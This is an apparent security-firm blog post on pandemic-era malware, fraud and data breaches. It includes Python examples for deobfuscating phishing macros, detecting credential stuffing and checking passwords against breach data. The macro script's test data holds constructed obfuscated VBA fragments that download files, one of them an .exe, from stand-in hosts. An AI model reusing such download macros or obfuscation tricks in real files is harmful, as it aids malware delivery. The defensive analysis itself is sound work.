Let’s get straight to the point — the current pandemic has been hard on businesses nationwide. Between adjusting to working from home, learning to market and sell exclusively online, and making sure all your employees are safe, it’s easy to let some things fall through the cracks, including cybersecurity. In this article, UOTech.co will take you through the ramifications of lowering your cybersecurity defenses, as well as notable instances of security breaches observed in networks of all sizes and calibers, from small businesses to the federal government, since the beginning of quarantine.
What Is Malware?
Malware is defined as any software that is designed to damage, disrupt, or infiltrate a device or network. Many types of programs fall under this umbrella, notably spyware, ransomware, traditional viruses, and worms.
Malware is an all-encompassing term that includes many forms of intentionally malicious software (in fact, the word malware was first coined in 1990 by the late Israeli professor Yisrael Radai, as a blend of the words “malicious” and “software”).
Spyware is a class of programs designed, as the name implies, to spy on infected devices. Features of spyware can include keyloggers (which record every keystroke entered by a user), Internet activity monitors, and collectors for stored user logins and passwords. Some spyware can also change the settings of the infected computer, redirect browser activity to malicious websites, and download software without a user’s consent.
Ransomware is designed to lock the data on an infected device so that users can’t access their files. This locking is usually accompanied by a demand for ransom payments in cryptocurrency, hence the name ransomware. Even if a ransom is paid, it is not uncommon for files to remain locked, and for the program to swiftly spread to other devices. Many of the most notorious malware families to date are ransomware, including Petya and WannaCry.
This ASCII art appeared on the screens of computers infected with certain variants of the Petya ransomware. The most recent severe Petya release happened in 2017.
Traditional viruses write themselves into programs already present on a computer, referred to as “hosts”, thereby infecting them and giving the virus an opportunity to spread. Once inside, a virus can modify other software on the computer, allowing it to corrupt data, steal personal information, send spam, and display threatening messages on the screen, to name just a few things. Viruses can also substantially slow down infected machines, negatively impacting your workflow.
Worms are standalone chunks of code that can self-replicate without a host program, allowing them to spread through networks incredibly quickly. They can be passed along through all manner of Internet activity, including infected websites, emails, shared files, and even your own servers if they’re not properly protected. Worms often carry a different piece of malware or malevolent script as a “payload,” allowing that payload to spread faster using the worm’s capabilities, but worms can be destructive on their own by causing a traffic overload.
There are other types of malware as well, including adware, malvertising, Trojan horses, and hybrids of more than one category. Low cybersecurity standards can leave your business open to any of these, endangering your data. Let’s delve into notable uses of malware since the beginning of the pandemic, to see how it affects real-world businesses.
Scattered Canary Scam
The CARES Act, put in place in response to the pandemic, includes multiple types of payouts. There are the $1,200 stimulus checks that most Americans received, but there are also unemployment wages and the extra $600/wk being given to those laid off. As soon as the act was instated, the U.S. government was hit with a titanic wave of claims, which they are still working through. Mixed in with these legitimate claims, however, were thousands of false ones from Nigerian scam ring Scattered Canary. They made off with a sum estimated to be multiple millions of dollars before being detected. How did they do it?
Well, long before the pandemic began, Scattered Canary was operating a “business email compromise” ring, using phishing and email-spread malware to obtain the identities and login credentials of innumerable business people. When combined with the data stolen in unrelated breaches of bank data, the ring had more than enough personal information available to file fraudulent claims. The state of Washington was hit the hardest by the wave of claims, even though it had just been given a $44M cybersecurity upgrade. It is unknown exactly how many claims were filed, but losses are estimated to be in the millions of dollars. Washington missed multiple red flags in the transactions, including payments to out-of-state banks and the use of suspicious email accounts, which the new security software was meant to scan for. All in all, the Scattered Canary fraud wave represents an utter failure in government cybersecurity, which was unfortunately exploited to the detriment of U.S. citizens.
…The biggest victims [of the fraud wave] may be the innumerable Washingtonians who now have had their legitimate and urgently needed claims for jobless benefits delayed as the state tries belatedly to halt the fraud. Others who have already received money say their claims are being investigated for “possible overpayment.”
MS Excel Phishing
On May 18, Microsoft Security Intelligence used Twitter to warn customers of a new phishing scam executed through Microsoft Excel. The scheme began with the sending of fraudulent emails, claiming to be from the Johns Hopkins Center on the topic of COVID-19. Each email contained an Excel attachment, presented as a graph of coronavirus cases in the U.S. When the attachment was opened, it would ask the user to enable macros, and then use the resultant security permissions to install a remote access tool (RAT) from NetSupport Manager, a legitimate remote management product. This program gives the perpetrators remote access to the computer, enabling them to take control of it and to view and steal data.
Microsoft reports that hundreds of unique macro programs were found in the emails it analyzed, each obfuscated as much as possible through the formatting of the macro itself, so as to make it look more legitimate. However, when analyzed more closely, every macro led back to the same URL, which would then install the RAT. The installed script also had the capability to connect to certain servers and potentially invoke Windows PowerShell, allowing it to make damaging changes to the infected computers and associated networks.
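The defensive takeaway from that paragraph is that hundreds of differently formatted macros collapse to one indicator once the string-building tricks are undone. The following Python script is an added example written for this article, not code from Microsoft or from the campaign: it evaluates the three obfuscation patterns most commonly seen in such macros (string concatenation with `&`, `Chr()` character codes, and `StrReverse`), resolves the assigned variables, and clusters a set of macro files by the URL they ultimately produce. The macro fragments, file names and `.invalid` domains are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample macro fragments (not the real campaign's macros). Three of
# them assemble the same URL in different ways; the fourth points elsewhere.
SAMPLE_MACROS = {
    "variant_a.vba": '''
Sub AutoOpen()
    Dim u As String
    u = "http://" & "example.invalid" & "/cases.xls"
    Download u
End Sub
''',
    "variant_b.vba": '''
Sub Workbook_Open()
    Dim p As String
    p = Chr(104) & Chr(116) & Chr(116) & Chr(112) & ":" & "//exam" & "ple.invalid/cases.xls"
    Download p
End Sub
''',
    "variant_c.vba": '''
Sub AutoOpen()
    Dim r As String
    r = StrReverse("slx.sesac/dilavni.elpmaxe//:ptth")
    Download r
End Sub
''',
    "variant_d.vba": '''
Sub AutoOpen()
    Dim other As String
    other = "https://" & "different.invalid" & "/a.exe"
    Download other
End Sub
''',
}

STRING_LIT = re.compile(r'^"((?:[^"]|"")*)"$')
CHR_CALL = re.compile(r'^Chr\(\s*(\d+)\s*\)$', re.I)
REV_CALL = re.compile(r'^StrReverse\((.*)\)$', re.I | re.S)
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
URL = re.compile(r'^https?://\S+$', re.I)


def split_concat(expr):
    """Split a VBA expression on top-level '&' (outside quotes and parentheses)."""
    parts, cur, depth, in_str = [], [], 0, False
    for c in expr:
        if c == '"':
            in_str = not in_str
        elif not in_str:
            if c == '(':
                depth += 1
            elif c == ')':
                depth -= 1
            elif c == '&' and depth == 0:
                parts.append(''.join(cur))
                cur = []
                continue
        cur.append(c)
    parts.append(''.join(cur))
    return [p.strip() for p in parts]


def evaluate(expr, env):
    """Reduce a string-building expression to the literal it produces."""
    expr = expr.strip()
    parts = split_concat(expr)
    if len(parts) > 1:
        return ''.join(evaluate(p, env) for p in parts)
    if (m := STRING_LIT.match(expr)):
        return m.group(1).replace('""', '"')   # VBA doubles quotes to escape them
    if (m := CHR_CALL.match(expr)):
        return chr(int(m.group(1)))
    if (m := REV_CALL.match(expr)):
        return evaluate(m.group(1), env)[::-1]
    if expr in env:                              # previously assigned variable
        return env[expr]
    raise ValueError(f"unsupported expression: {expr!r}")


def extract_urls(macro_text):
    """Walk assignments in order, keeping variable values, and collect URL results."""
    env, urls = {}, set()
    for line in macro_text.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, expr = m.groups()
        try:
            value = evaluate(expr, env)
        except ValueError:
            continue                             # not a string expression we model
        env[name] = value
        if URL.match(value):
            urls.add(value)
    return urls


def cluster_by_url(macros):
    """Map each resolved URL to the sorted list of macro files that produce it."""
    clusters = defaultdict(list)
    for name, text in macros.items():
        for url in extract_urls(text):
            clusters[url].append(name)
    return {url: sorted(names) for url, names in clusters.items()}


if __name__ == "__main__":
    for url, names in cluster_by_url(SAMPLE_MACROS).items():
        print(f"{url}  <-  {', '.join(names)}")
```

Run on the four constructed variants, the script reports a single cluster of three files behind `http://example.invalid/cases.xls` and a separate one-file cluster, which is exactly the kind of collapse that turns a pile of attachments into one URL to block and one indicator to search for in mail logs.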
Data Breaches Galore
Data breaches are more common than one might think, even among major corporations. Since the beginning of the year, there have been innumerable breaches of customer data at online shops and services. For example, in April, a research team named Cyble discovered half a million Zoom account logins, which had been taken in a data breach, for sale on the dark web. Not more than a week later, the same team found the identities of 267 million Facebook users listed on the dark web, for the measly sum of $540. The Facebook data seems to come from a prior breach and did not include passwords, but it did include full names, Facebook IDs, dates of birth, and more. Most worryingly, Carnival Corp. disclosed in March of this year a breach of customer data including full names, SSNs, passport numbers, government ID numbers, and credit card details.
A sample of the Facebook data found for sale, blurred by UOTech.co for privacy. (Cyble via Forbes)
Even before quarantine began, retail websites and storefronts had fallen victim to hacking multiple times this year. In January, Hanna Andersson, a popular children’s clothing brand, suffered a data breach that included the card numbers, CVVs, expiration dates, and personal information of an unknown number of online customers. Near-simultaneously, 63 restaurants belonging to Landry’s Inc., potentially including locations of Bubba Gump Shrimp Co. and Rainforest Café among others, experienced a hack of their point-of-sale systems, which resulted in a breach of some customer payment data. Fortunately for Landry’s, most of their data was protected by end-to-end encryption, so the breach was much less severe than it easily could have been.
Most of these attacks were carried out through “credential stuffing,” a process in which hackers take data that has been released in a prior breach and try using it to log into other websites. This does not fall under the category of malware, but it is a common method for bad actors to instigate data breaches. Credential stuffing can be hard to detect, but a good cybersecurity system can track the orders that result in fraud and blacklist their IP addresses in order to prevent them from recurring. If all corporations had tight cybersecurity, the breaches that credential stuffing relies on would also decline.
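What makes credential stuffing detectable is its shape in the authentication log: one source address trying many different usernames in a short window, with most attempts failing. The Python below is an added example written for this article (not UOTech.co’s or any vendor’s product) that runs that rule over a few constructed log lines, reports which accounts were successfully opened from a flagged address so they can be reset, and merges the flagged addresses with a constructed list of addresses tied to fraudulent orders into one blocklist, as the paragraph describes. The log format, the IP addresses (all from documentation ranges), the usernames and the thresholds are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication log (not real traffic). 203.0.113.7 walks through a
# list of usernames; 198.51.100.4 is one user mistyping a password twice.
SAMPLE_LOG = """\
2020-05-18T10:00:01Z ip=203.0.113.7 user=alice result=FAIL
2020-05-18T10:00:02Z ip=203.0.113.7 user=bob result=FAIL
2020-05-18T10:00:03Z ip=203.0.113.7 user=carol result=FAIL
2020-05-18T10:00:04Z ip=203.0.113.7 user=dave result=FAIL
2020-05-18T10:00:05Z ip=203.0.113.7 user=erin result=FAIL
2020-05-18T10:00:06Z ip=203.0.113.7 user=frank result=OK
2020-05-18T10:00:07Z ip=203.0.113.7 user=grace result=FAIL
2020-05-18T10:00:08Z ip=203.0.113.7 user=heidi result=FAIL
2020-05-18T10:01:00Z ip=198.51.100.4 user=carol result=FAIL
2020-05-18T10:01:20Z ip=198.51.100.4 user=carol result=FAIL
2020-05-18T10:01:45Z ip=198.51.100.4 user=carol result=OK
2020-05-18T10:02:00Z ip=198.51.100.9 user=dave result=OK
this line is malformed and is skipped by the parser
"""

# Constructed: addresses behind orders that were later charged back as fraud.
FRAUD_ORDER_IPS = {"192.0.2.88"}

LOG_LINE = re.compile(
    r'^(?P<ts>\S+)\s+ip=(?P<ip>\S+)\s+user=(?P<user>\S+)\s+result=(?P<result>OK|FAIL)$'
)


def parse_log(text):
    """Turn log lines into event dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "ip": m["ip"],
            "user": m["user"],
            "ok": m["result"] == "OK",
        })
    return events


def flag_stuffing_ips(events, window=timedelta(minutes=10), min_users=5, min_fail_ratio=0.5):
    """Flag an IP when, inside any sliding window, it has tried at least `min_users`
    distinct usernames and at least `min_fail_ratio` of those attempts failed.
    Returns overall per-IP totals for each flagged address."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for i, cur in enumerate(evs):
            recent = [e for e in evs[:i + 1] if cur["ts"] - e["ts"] <= window]
            users = {e["user"] for e in recent}
            fails = sum(1 for e in recent if not e["ok"])
            if len(users) >= min_users and fails / len(recent) >= min_fail_ratio:
                flagged[ip] = {
                    "attempts": len(evs),
                    "distinct_users": len({e["user"] for e in evs}),
                    "failures": sum(1 for e in evs if not e["ok"]),
                }
                break
    return flagged


def compromised_accounts(events, flagged):
    """Accounts that a flagged IP logged into successfully: candidates for a forced reset."""
    return {e["user"] for e in events if e["ip"] in flagged and e["ok"]}


def build_blocklist(flagged, fraud_order_ips):
    """Combine stuffing sources with addresses behind confirmed fraudulent orders."""
    return set(flagged) | set(fraud_order_ips)


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    flagged = flag_stuffing_ips(events)
    print("flagged:", flagged)
    print("reset these accounts:", compromised_accounts(events, flagged))
    print("blocklist:", build_blocklist(flagged, FRAUD_ORDER_IPS))
```

The distinct-username condition is what keeps the legitimate user who fails twice from being blocked; tune `min_users` and the window to the size of the site, and note that real stuffing campaigns spread attempts across many proxies, so the per-IP rule is a first filter rather than the whole defense.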
Companies… are increasingly attempting to detect and block credential stuffing attempts. And some like Google (which also owns Nest) have started initiatives to proactively check whether users’ account credentials have been compromised in breaches and trigger password resets if they discover a match. But the trick is to do all of this without blocking or hindering legitimate activity.
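The proactive check the quotation describes can be done without the service ever receiving the user’s password or even its full hash. The Python below is an added example for this article, not Google’s or any vendor’s implementation; it uses the range-query pattern popularised by the Pwned Passwords service (send only the first five hex characters of a SHA-1 hash, receive every suffix under that prefix, match locally). The breach corpus, its counts and the passwords in it are constructed; SHA-1 is used here purely as a lookup key for matching against breach data, not as a way to store passwords.

```python
import hashlib
from collections import defaultdict

# Constructed breach corpus: password -> number of times it appeared in leaks.
# A real service holds only hashes and counts, never the plaintext.
BREACH_CORPUS = {
    "password": 3861493,
    "letmein": 112345,
    "Summer2020!": 57,
}


def sha1_hex(s):
    """Uppercase hex SHA-1 of a string, used only as a lookup key."""
    return hashlib.sha1(s.encode("utf-8")).hexdigest().upper()


def build_range_index(corpus):
    """Server side: bucket hash suffixes under their 5-character prefix."""
    index = defaultdict(dict)
    for password, count in corpus.items():
        digest = sha1_hex(password)
        index[digest[:5]][digest[5:]] = count
    return index


def range_query(index, prefix):
    """Server side: answer a prefix query. The server learns only 20 bits of the hash."""
    if len(prefix) != 5:
        raise ValueError("prefix must be exactly 5 hex characters")
    return dict(index.get(prefix.upper(), {}))


def breach_count(index, password):
    """Client side: hash locally, send the prefix, match the suffix locally."""
    digest = sha1_hex(password)
    return range_query(index, digest[:5]).get(digest[5:], 0)


def needs_reset(index, password, threshold=1):
    """Policy hook: trigger a reset once the password has been seen `threshold` times."""
    return breach_count(index, password) >= threshold


if __name__ == "__main__":
    index = build_range_index(BREACH_CORPUS)
    for candidate in ["password", "Summer2020!", "correct horse battery staple"]:
        print(f"{candidate!r}: seen {breach_count(index, candidate)} times,"
              f" reset={needs_reset(index, candidate)}")
```

Because the client only ever sends a prefix, a match can be enforced at login time or during a background sweep of stored hashes without exposing the credential to the checking service, which is the “without hindering legitimate activity” balance the quotation points at: the user with a clean password sees nothing, and only a confirmed match triggers the reset.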
Malware is a scary thing, and can be extremely detrimental to the functioning of your business. Hackers and scammers will never quit trying to make a quick buck, or cause damage for damage’s sake, by creating malware and instigating data breaches. However, good cybersecurity practices can go a long way in preventing attacks on your computers and network. If your business is not adequately protected, looking into hiring an IT and security firm to handle your cybersecurity may be the solution for you.
Intern at UOTech.co
Madeleine Avni is a student at Rensselaer Polytechnic Institute, with over four years of experience in programming and cybersecurity. She is an intern at UOTech.co, an employee-owned and operated IT Consulting, Managed Services, and Information Security company based out of Long Island, NY.